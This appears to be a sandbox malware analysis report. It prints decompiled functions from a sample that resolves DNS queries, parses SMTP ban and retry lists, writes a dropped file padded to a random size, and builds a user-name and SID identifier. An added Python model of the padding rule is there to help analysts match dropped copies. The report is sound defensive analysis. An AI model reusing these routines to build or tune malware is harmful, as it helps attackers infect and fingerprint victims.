                                                                                						L2:
                                                                                						return 0;
                                                                                					}
                                                                                					_push(_t39);
                                                                                					_t35 =  &_v16;
                                                                                					_push( &_v16);
                                                                                					_push(_t39);
                                                                                					_push(_t39);
                                                                                					_push(0xf);
                                                                                					_push(_a4);
                                                                                					if( *_t20() != 0) {
                                                                                						goto L2;
                                                                                					}
                                                                                					_t37 = _v16;
                                                                                					_v8 = _t39;
                                                                                					_v12 = _t39;
                                                                                					if(_t37 == _t39) {
                                                                                						L14:
                                                                                						return _v12;
                                                                                					}
                                                                                					do {
                                                                                						if( *((short*)(_t37 + 8)) != 0xf) {
                                                                                							goto L12;
                                                                                						}
                                                                                						_t40 = HeapAlloc(GetProcessHeap(), _t39, 0x108);
                                                                                						if(_t40 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						E0040EE2A(_t35, _t40, 0, 0x108);
                                                                                						_t41 = _t41 + 0xc;
                                                                                						 *(_t40 + 4) =  *(_t37 + 0x1c) & 0x0000ffff;
                                                                                						_t13 = _t40 + 8; // 0x8
                                                                                						lstrcpynA(_t13,  *(_t37 + 0x18), 0xff);
                                                                                						_t30 = _v8;
                                                                                						_v8 = _t40;
                                                                                						if(_t30 != 0) {
                                                                                							 *_t30 = _t40;
                                                                                						} else {
                                                                                							_v12 = _t40;
                                                                                						}
                                                                                						L12:
                                                                                						_t37 =  *_t37;
                                                                                						_t39 = 0;
                                                                                					} while (_t37 != 0);
                                                                                					goto L14;
                                                                                				}
                                                                                				_t19 = LoadLibraryA( &_v28);
                                                                                				if(_t19 != 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 00402D61
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108,000DBBA0), ref: 00402D99
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00402DA0
                                                                                • lstrcpynA.KERNEL32(00000008,?,000000FF), ref: 00402DCB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: DnsQuery_A$dnsapi.dll
                                                                                • API String ID: 3560063639-3847274415
                                                                                • Opcode ID: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction ID: e5e1ee734cbcfb8ca4eff609f7c37a2f42b45bda1feb54b0ffc2340cedddb21a
                                                                                • Opcode Fuzzy Hash: d4096c20dd1105e3ef32148a9c5654c80b560ad64ac552135804a6a2b7bfb5e3
                                                                                • Instruction Fuzzy Hash: 25214F7190022AABCB11AB55DD48AEFBBB8EF08750F104432F905B7290D7F49E8587D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E0040BE31(signed int _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				CHAR* _v12;
                                                                                				int _v16;
                                                                                				int _t50;
                                                                                				int _t51;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t55;
                                                                                				intOrPtr _t57;
                                                                                				void* _t59;
                                                                                				char* _t66;
                                                                                				CHAR* _t68;
                                                                                				int _t71;
                                                                                				int _t72;
                                                                                				void* _t76;
                                                                                				intOrPtr _t78;
                                                                                				signed int _t82;
                                                                                				signed int _t83;
                                                                                				signed int _t84;
                                                                                				intOrPtr* _t86;
                                                                                				void* _t88;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                
                                                                                				_t83 = _a4;
                                                                                				_t68 = _t83 + 4; // config record: entry name string starts at offset 4
                                                                                				_v12 = _t68;
                                                                                				// only the smtp_herr / smtp_ban / smtp_retr entries are handled here
                                                                                				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
                                                                                					L3:
                                                                                					_t72 = 0;
                                                                                					_v16 = 0;
                                                                                					if(_a8 == 3) {
                                                                                						L25:
                                                                                						// pick the global list slot that belongs to this entry name
                                                                                						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
                                                                                							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
                                                                                								_t50 = lstrcmpiA(_v12, "smtp_retr");
                                                                                								_t51 = 0x413638;
                                                                                								if(_t50 != 0) {
                                                                                									_t51 = _a4;
                                                                                								}
                                                                                							} else {
                                                                                								_t51 = 0x413634;
                                                                                							}
                                                                                						} else {
                                                                                							_t51 = 0x413630;
                                                                                						}
                                                                                						// swap in the freshly built string array, then release the previous one
                                                                                						_t86 =  *_t51;
                                                                                						 *_t51 = _v16;
                                                                                						if(_t86 == 0) {
                                                                                							goto L36;
                                                                                						} else {
                                                                                							_t52 =  *_t86;
                                                                                							_t84 = 0;
                                                                                							// E0040EC2E behaves like free(): each string, then the NULL-terminated array itself
                                                                                							while(_t52 != 0) {
                                                                                								E0040EC2E(_t52);
                                                                                								_t84 = _t84 + 1;
                                                                                								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
                                                                                							}
                                                                                							return E0040EC2E(_t86);
                                                                                						}
                                                                                					}
                                                                                					_t55 =  *((intOrPtr*)(_t83 + 0x18)); // payload length at offset 0x18; payload bytes start at 0x24
                                                                                					_t82 = 0;
                                                                                					if(_t55 <= 0) {
                                                                                						goto L25;
                                                                                					} else {
                                                                                						goto L5;
                                                                                					}
                                                                                					// first pass: count lines (LF-terminated, plus an unterminated last line)
                                                                                					do {
                                                                                						L5:
                                                                                						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
                                                                                							_t82 = _t82 + 1;
                                                                                						}
                                                                                						_t72 = _t72 + 1;
                                                                                					} while (_t72 < _t55);
                                                                                					if(_t82 == 0) {
                                                                                						goto L25;
                                                                                					}
                                                                                					// allocate a zeroed pointer array with one extra slot as NULL terminator
                                                                                					// (E0040EBCC appears to be an allocator, E0040EE2A a memset-style helper)
                                                                                					_t70 = 4 + _t82 * 4;
                                                                                					_t51 = E0040EBCC(4 + _t82 * 4);
                                                                                					_pop(_t76);
                                                                                					_v16 = _t51;
                                                                                					if(_t51 == 0) {
                                                                                						goto L36;
                                                                                					}
                                                                                					E0040EE2A(_t76, _t51, 0, _t70);
                                                                                					_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                					_v8 = _v8 & 0x00000000;
                                                                                					_a4 = _a4 & 0x00000000;
                                                                                					_t92 = _t91 + 0xc;
                                                                                					if(_t57 > 0) {
                                                                                						_t71 = _v16;
                                                                                						// second pass: copy each line into its own buffer, NUL-terminate it and strip a trailing CR
                                                                                						do {
                                                                                							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
                                                                                							if(_t78 == 0xa || _a4 == _t57 - 1) {
                                                                                								_t88 = _a4 - _v8; // length of the current line, excluding the LF
                                                                                								if(_t78 != 0xa) {
                                                                                									_t88 = _t88 + 1;
                                                                                								}
                                                                                								_t25 = _t88 + 1; // 0x1
                                                                                								_t59 = E0040EBCC(_t25);
                                                                                								 *_t71 = _t59;
                                                                                								if(_t59 == 0) {
                                                                                									goto L25;
                                                                                								} else {
                                                                                									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88); // memcpy-style helper
                                                                                									_t92 = _t92 + 0xc;
                                                                                									 *((char*)(_t88 +  *_t71)) = 0;
                                                                                									if(_t88 > 0) {
                                                                                										_t31 =  *_t71 - 1; // -1
                                                                                										_t66 = _t88 + _t31;
                                                                                										if( *_t66 == 0xd) {
                                                                                											 *_t66 = 0;
                                                                                										}
                                                                                									}
                                                                                									_t71 = _t71 + 4;
                                                                                									_v8 = _v8 + _t88 + 1; // advance to the start of the next line
                                                                                									goto L22;
                                                                                								}
                                                                                							}
                                                                                							L22:
                                                                                							_a4 = _a4 + 1;
                                                                                							_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                						} while (_a4 < _t57);
                                                                                					}
                                                                                					goto L25;
                                                                                				} else {
                                                                                					_t51 = lstrcmpiA(_t68, "smtp_retr");
                                                                                					if(_t51 != 0) {
                                                                                						L36:
                                                                                						return _t51;
                                                                                					}
                                                                                					goto L3;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                • API String ID: 1586166983-1625972887
                                                                                • Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                • Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				// Creates the file named by _a4, hands the data described by (_a8, _a12) to
				// E00406987 and, when the destination volume has room, replaces the size
				// argument with a randomised 3..5 MiB or 10..15 MiB value. Any failure after
				// CreateFileA records an internal error code at 0x412180 plus the Win32
				// error at 0x41217c and deletes the partially written file.
				_t59 = __edx;
				_t68 = _a4;
				// GENERIC_WRITE, no sharing, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					// INVALID_HANDLE_VALUE
					 *0x412180 = 0x61040101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				// _v8.._v5 hold the drive root "X:\" taken from the first three characters of the path
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;                 // default size argument: the caller's _a12
				_v6 = _t68[2];
				_v5 = 0;
				// GetDiskFreeSpaceA(root, &sectorsPerCluster (_v20), &bytesPerSector (_v24),
				//                   &freeClusters (_v16), &totalClusters (_v32))
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					// write in 0x500000 (5 MiB) steps; _t63 is the size argument chosen below
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x61040103;   // CloseHandle failed
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);         // remove the partial file on any error
						goto L15;
					}
					 *0x412180 = 0x61040102;       // E00406987 (write) failed
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				// 64-bit free bytes = (sectorsPerCluster * bytesPerSector) * freeClusters;
				// E0040EB0E is the 64-bit multiply helper: low dword in _t53, high dword in
				// edx, which the decompiler tracks as _t59/_t73 from here on
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;                      // high dword negative: keep _a12
				}
				// more than 0x6400000 (100 MiB) free: size = 10 MiB + (rand % 5 MiB)
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						// more than 0x3200000 (50 MiB) free: size = 3 MiB + (rand & 0x1fffff)
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						// decompiler rendering of the flag result of the same instruction
						// (0x00406b17), not a second call to E0040ECA5
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;                  // 50 MiB or less free: keep _a12
					}
					goto L9;
				}
			}

Instruction addresses for the listing above, one per line of the function body in source order (0x00000000 where the decompiler synthesized the statement, e.g. goto or return):
0x00406a60 0x00406a68 0x00406a7d 0x00406a83 0x00406a89 0x00406b8c 0x00406b9c 0x00406ba1
0x00000000 0x00406ba1 0x00406a91 0x00406a97 0x00406a9e 0x00406aa1 0x00406ab8 0x00406ac3
0x00406b1d 0x00406b27 0x00406b2f 0x00406b34 0x00406b5f 0x00406b61 0x00406b63 0x00406b86
0x00000000 0x00406b89 0x00406b65 0x00406b78 0x00406b7d 0x00406b7f 0x00406b80 0x00000000
0x00406b80 0x00406b36 0x00406b49 0x00406b4e 0x00000000 0x00406b4e 0x00406ad2 0x00406ad7
0x00406ada 0x00406adc 0x00000000 0x00000000 0x00406ade 0x00406af5 0x00406af5 0x00000000
0x00406afd 0x00406afd 0x00406aff 0x00000000 0x00000000 0x00406b01 0x00406b0a 0x00406b17
0x00406b17 0x00000000 0x00406b17 0x00406b03 0x00406b08 0x00000000 0x00000000 0x00000000
0x00406b08

APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,74CF81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
• GetDiskFreeSpaceA.KERNEL32(00409E9D,00409A60,?,?,?,004122F8,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
• DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
• GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
• String ID:
• API String ID: 3188212458-0
• Opcode ID: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
• Instruction ID: 425ce4a4a5363573a79131118f251082e1da2794364dd09a1208fe8084ee845e
• Opcode Fuzzy Hash: f470ed9999743a5fb12dc2784f1c2880128520c421616f03f4739b26db8e28dc
• Instruction Fuzzy Hash: C731E0B2900108BFDB00DFA09D44ADF7F78AF48310F158076E112F7291D674A9608F69
Uniqueness

Uniqueness Score: -1.00%
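The size selection in E00406A60 decides how large the dropped file will be on a given volume, which is what a triage analyst needs when matching a dropped copy against this sample. The model below is an added example written for this page; it is not code from the report or from the sample. It assumes that E0040EB0E is the 64-bit multiply helper, that E0040ECA5 behaves like a rand() returning a non-negative 32-bit value, and that the fifth argument of E00406987 is the size the written file ends up with; the disk figures in the usage line are constructed.

```python
"""Size policy of E00406A60, modelled from the decompiled listing (added example)."""
from typing import Callable, Optional, Tuple

MIB = 1024 * 1024
HIGH_WATER = 0x6400000   # > 100 MiB free selects the 10..15 MiB band
LOW_WATER = 0x3200000    # > 50 MiB free selects the 3..5 MiB band
BAND_HIGH = (0xA00000, 0xA00000 + 0x500000)   # rand % 0x500000 + 0xa00000
BAND_LOW = (0x300000, 0x300000 + 0x200000)    # (rand & 0x1fffff) + 0x300000


def free_bytes(sectors_per_cluster: int, bytes_per_sector: int, free_clusters: int) -> int:
    """64-bit product the sample computes (via E0040EB0E, assumed __allmul)
    from the GetDiskFreeSpaceA output."""
    return (sectors_per_cluster * bytes_per_sector * free_clusters) & 0xFFFFFFFFFFFFFFFF


def choose_size(free: int, payload_len: int, rnd: Callable[[], int]) -> int:
    """Value handed to E00406987 as its fifth argument.

    free        64-bit free-byte count (see free_bytes)
    payload_len the caller's _a12, kept when the volume is small or when the
                high dword is negative (the decompiled code tests it as signed)
    rnd         stand-in for E0040ECA5 (assumption: non-negative 32-bit output)
    """
    high, low = free >> 32, free & 0xFFFFFFFF
    if high & 0x80000000:                 # signed high dword < 0: unchanged
        return payload_len
    if high > 0 or low > HIGH_WATER:      # more than 100 MiB free
        return rnd() % 0x500000 + 0xA00000
    if low > LOW_WATER:                   # more than 50 MiB free
        return (rnd() & 0x001FFFFF) + 0x300000
    return payload_len                    # 50 MiB or less: no padding


def size_band(free: int) -> Optional[Tuple[int, int]]:
    """Half-open [lo, hi) range of sizes the dropper can produce for a volume
    with `free` bytes free, or None when it keeps the payload length."""
    high, low = free >> 32, free & 0xFFFFFFFF
    if high & 0x80000000:
        return None
    if high > 0 or low > HIGH_WATER:
        return BAND_HIGH
    if low > LOW_WATER:
        return BAND_LOW
    return None


def in_band(size: int, free: int) -> bool:
    """True if an observed dropped-file size is consistent with this policy
    for the free space the volume had at drop time."""
    band = size_band(free)
    return band is not None and band[0] <= size < band[1]


if __name__ == "__main__":
    import random
    # constructed volume figures: 4 KiB clusters, about 1.9 GiB free
    free = free_bytes(8, 512, 500_000)
    print(f"free={free:#x} band={size_band(free)} "
          f"size={choose_size(free, 0x1234, lambda: random.getrandbits(32)):#x}")
```

On any volume with more than 100 MiB free, which is every realistic target, the dropped copy lands between 10 MiB and 15 MiB; the payload's own length is only used when the volume has 50 MiB or less. One caveat on the assumption about E0040ECA5: if it is the CRT rand(), whose output is 0..0x7fff, both the modulo and the mask are no-ops and the size varies by at most 32 KiB above 10 MiB or 3 MiB.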

APIs
• IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 00E367C3
• htonl.WS2_32(?), ref: 00E367DF
• htonl.WS2_32(?), ref: 00E367EE
• GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 00E368F1
• ExitProcess.KERNEL32 ref: 00E369BC
Strings
Memory Dump Source
• Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: Processhtonl$CurrentExitHugeRead
• String ID: except_info$localcfg
• API String ID: 1150517154-3605449297
• Opcode ID: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
• Instruction ID: 5e7c401e611838baac5333ae1437ff3108f9ad8f0c908e3cf1d2fe8233022498
• Opcode Fuzzy Hash: 8c67a5bde2c17ed3aff6f0ea1f646f2c63f3a3fdf38cb08711d1dfe4718764d5
• Instruction Fuzzy Hash: 79616F71940208AFDB609FB4DC45FEA7BE9FF48300F248066FA6DD2161DA759990CF54
Uniqueness

Uniqueness Score: -1.00%

APIs
• htons.WS2_32(00E3CC84), ref: 00E3F5B4
• socket.WS2_32(00000002,00000001,00000000), ref: 00E3F5CE (AF_INET, SOCK_STREAM, protocol 0: a TCP socket)
• closesocket.WS2_32(00000000), ref: 00E3F5DC
Strings
Memory Dump Source
• Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: closesockethtonssocket
• String ID: time_cfg
• API String ID: 311057483-2401304539
• Opcode ID: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
• Instruction ID: 4a6399c1af0cfc37f2e3811fbf7e86529f780d53bb1fc5e500d7c7f25ed0d362
• Opcode Fuzzy Hash: 35ab9fe366417f7a0644d99ffa926dabfa0554eb5add049d4f688aed03fde98e
• Instruction Fuzzy Hash: CC314972900119ABDB119FA5DC89DEEBBBCEF88314F10456AF915E3150E7709A81CBE4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E00406F5F(long _a4, long _a8) {
				void* _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				void _v84;
				char _v212;
				CHAR* _t36;
				void* _t53;
				intOrPtr* _t54;
				char _t62;
				void* _t65;
				char* _t66;
				intOrPtr _t67;
				CHAR* _t68;
				void* _t69;

				// Builds "<user name>/<string SID>/<number>" in the caller's buffer _a4
				// (_a8 is its size on entry); the SID part is omitted when the lookup fails.
				// Returns the length written, or 0 when GetUserNameA fails. Note that _a8 is
				// overwritten with the name length below, so nothing appended afterwards is
				// checked against the buffer size.
				_t68 = _a4;
				 *_t68 = 0;
				if(GetUserNameA(_t68,  &_a8) == 0) {
					return 0;
				}
				// inline strlen of the user name
				_t36 = _t68;
				_t66 =  &(_t36[1]);
				do {
					_t62 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t62 != 0);
				_a8 = _t36 - _t66;
				_a4 = 0x7c;                   // cbSid: 124-byte SID buffer (_v84)
				_v12 = 0x80;                  // cchReferencedDomainName: 128-char domain buffer (_v212)
				// LookupAccountNameA(NULL, name, &sid, &cbSid, domain, &cchDomain, &sidNameUse)
				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
					L8:
					// append "/%d"; what E00406EDD returns is not identified in the report
					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E00406EDD());
					return _a8;
				}
				E0040EF00( &(_t68[_a8]), "/");   // strcpy-style append of "/"
				_a8 = _a8 + 1;
				// L0040F4AA is the import thunk for ConvertSidToStringSidA(&_v84, &_v8)
				// (APIs list, ref 00406FE8); the decompiler reuses _t53 for its BOOL result
				_push( &_v8);
				_t53 =  &_v84;
				_push(_t53);
				L0040F4AA();
				if(_t53 == 0) {
					goto L8;
				}
				// inline strlen of the string SID, then copy it including the NUL
				_t54 = _v8;
				_t20 = _t54 + 1; // 0x121
				_t65 = _t20;
				do {
					_t67 =  *_t54;
					_t54 = _t54 + 1;
				} while (_t67 != 0);
				_a4 = _t54 - _t65;
				E0040EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);   // memcpy-style, length + 1
				_a8 = _a8 + _a4;
				_t69 = _t69 + 0xc;
				LocalFree(_v8);               // the string SID is LocalAlloc'ed by ConvertSidToStringSidA
				goto L8;
			}

Instruction addresses for the listing above, one per line of the function body in source order (0x00000000 where the decompiler synthesized the statement, e.g. goto or return):
0x00406f6c 0x00406f77 0x00406f82 0x00000000 0x00407047 0x00406f88 0x00406f8a 0x00406f8d
0x00406f8d 0x00406f8f 0x00406f90 0x00406f96 0x00406fb3 0x00406fba 0x00406fc9 0x00407025
0x0040703f 0x00000000 0x00407042 0x00406fd6 0x00406fdb 0x00406fe3 0x00406fe4 0x00406fe7
0x00406fe8 0x00406fef 0x00000000 0x00000000 0x00406ff1 0x00406ff4 0x00406ff4 0x00406ff7
0x00406ff7 0x00406ff9 0x00406ffa 0x00407000 0x0040700e 0x00407016 0x00407019 0x0040701f
0x00000000

APIs
• GetUserNameA.ADVAPI32(?,0040D7C3), ref: 00406F7A
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0040D7C3), ref: 00406FC1
• ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 00406FE8
• LocalFree.KERNEL32(00000120), ref: 0040701F
• wsprintfA.USER32 ref: 00407036
Strings
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
• String ID: /%d$|
• API String ID: 676856371-4124749705
• Opcode ID: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
• Instruction ID: 25602f0bb6ce76eb5d01febd46d0227a680cec7408ef54ec30c82d1084126da1
• Opcode Fuzzy Hash: a4e95b79f46088df25ad898cee238acd61ae00be348fc6b2bdbab1b8b404bd7d
• Instruction Fuzzy Hash: B5313C72900209BFDB01DFA5DC45BDB7BBCEF04314F048166F949EB241DA79EA588B98
Uniqueness

Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 00E32FA1
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00E32FB1
                                                                                • GetProcAddress.KERNEL32(00000000,004103F0), ref: 00E32FC8
                                                                                • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00E33000
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E33007
                                                                                • lstrcpyn.KERNEL32(00000008,?,000000FF), ref: 00E33032
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AddressAllocateHandleLibraryLoadModuleProcProcesslstrcpyn
                                                                                • String ID: dnsapi.dll
                                                                                • API String ID: 1242400761-3175542204
                                                                                • Opcode ID: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction ID: 56cf540a316d673c938d3197f65eb8a0202f9cbc5187a8c851748cf7c0ce225b
                                                                                • Opcode Fuzzy Hash: 7f5d185b3cfc49c95be658a26291c7e098e834ef0b89546cb75d65dd2dad2050
                                                                                • Instruction Fuzzy Hash: 1F217C71A00229ABCB219BA4DC48AAEBFB8EF08B14F104425F941B7150D7B49E81CBE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E00406CC9(void* __ecx) {
                                                                                				_Unknown_base(*)()* _t8;
                                                                                				CHAR* _t17;
                                                                                				void* _t18;
                                                                                				void* _t23;
                                                                                				char _t25;
                                                                                				void* _t34;
                                                                                
                                                                                				_t23 = __ecx;
                                                                                				if( *0x412e08 != 0) {
                                                                                					L14:
                                                                                					return 0x412e08;
                                                                                				}
                                                                                				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
                                                                                				if(_t8 == 0) {
                                                                                					L4:
                                                                                					if(GetSystemDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                						if(GetWindowsDirectoryA(0x412e08, 0x104) == 0 ||  *0x412e08 == 0) {
                                                                                							E0040EF00(0x412e08, E00402544(0x4122f8, 0x410664, 0xb, 0xe4, 0xc8));
                                                                                							E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                							_t34 = _t34 + 0x28;
                                                                                						}
                                                                                						E0040EF1E(0x412e08, E00402544(0x4122f8, 0x410658, 0xb, 0xe4, 0xc8));
                                                                                						E0040EE2A(_t23, 0x4122f8, 0, 0x100);
                                                                                					}
                                                                                					L10:
                                                                                					_t17 = 0x412e08;
                                                                                					goto L11;
                                                                                					L11:
                                                                                					_t25 =  *_t17;
                                                                                					_t17 =  &(_t17[1]);
                                                                                					if(_t25 != 0) {
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_t18 = _t17 - 0x412e09;
                                                                                						if( *((char*)(_t18 + 0x412e07)) != 0x5c) {
                                                                                							 *((char*)(_t18 + 0x412e08)) = 0x5c;
                                                                                							 *((char*)(_t18 + 0x412e09)) = _t25;
                                                                                						}
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                				_push(0x104);
                                                                                				_push(0x412e08);
                                                                                				if( *_t8() == 0 ||  *0x412e08 == 0) {
                                                                                					goto L4;
                                                                                				} else {
                                                                                					goto L10;
                                                                                				}
                                                                                			}

